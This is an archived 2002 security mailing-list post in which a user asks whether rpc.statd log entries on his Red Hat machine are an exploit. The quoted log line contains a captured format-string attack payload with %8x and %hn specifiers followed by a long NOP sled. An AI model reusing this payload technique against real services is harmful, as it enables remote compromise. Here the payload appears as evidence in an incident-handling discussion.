Exploit in rpc.statd 0.3.3?

From: Roy Sigurd Karlsbakk (roy@karlsbakk.net)
Date: 07/08/02

Previous message: harston: "ftp directory scan"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: Roy Sigurd Karlsbakk <roy@karlsbakk.net>
To: incidents@securityfocus.com
Date: Mon, 8 Jul 2002 17:10:56 +0200

hi all

The other day, my PC, running redhat 7.3, rebooted without a given reason.
Checking the logs, I find these rather strange lines as below, looking like
shellcode. I keep seeing quite a few of them. An hour or so before it booted,
I had one.

Can anyone help me out if this is an exploit? I heard about something like
this on debian, but not on redhat

see below for the log entry

roy

Jul 8 13:11:45 roy-sin rpc.statd[739]: gethostbyname error for
^X÷ÿ¿^X÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

-- Roy Sigurd Karlsbakk, Datavaktmester

Computers are like air conditioners. They stop working when you open Windows.

---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com

Previous message: harston: "ftp directory scan"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: Strange FTP logs
... > password had been guessed (found no signs of brute-force in the logs ... the pgo account wasn't used anymore since about a month and ... > I show you the log here and note the strange behavior these clients ... > Can't change directory to .tmp: ...
(Incidents)
Re: 2.6.9-rc2-mm3: swsusp horribly slow on AMD64
... > I've got two logs, one of which is taken from the system with all ... Strange, *very* strange. ... +#ifdef CONFIG_KGDB_SYSRQ ... send the line "unsubscribe linux-kernel" in ...
(Linux-Kernel)
Calendar problems!
... So in a strange twist... ... fine when he logs into OWA... ... >calendar entries other than those he manually enters. ...
(microsoft.public.outlook.calendaring)
Re: Spontaneously reboots all over LAN
... certainly a blaster worm or variant. ... > Again nothing showed up in event logs or firewall traffic ... > No strange services are running and no tasks are scheduled. ... > No strange events are shown, only the unexpected shutdown ...
(microsoft.public.win2000.general)
Re: SOHO firewall dropping incoming 443 connections - incorrect state
... Strange, I take it this sample snip of your logs is from a single session? ... One source (remote) IP, to one Destination IP? ...
(comp.security.firewalls)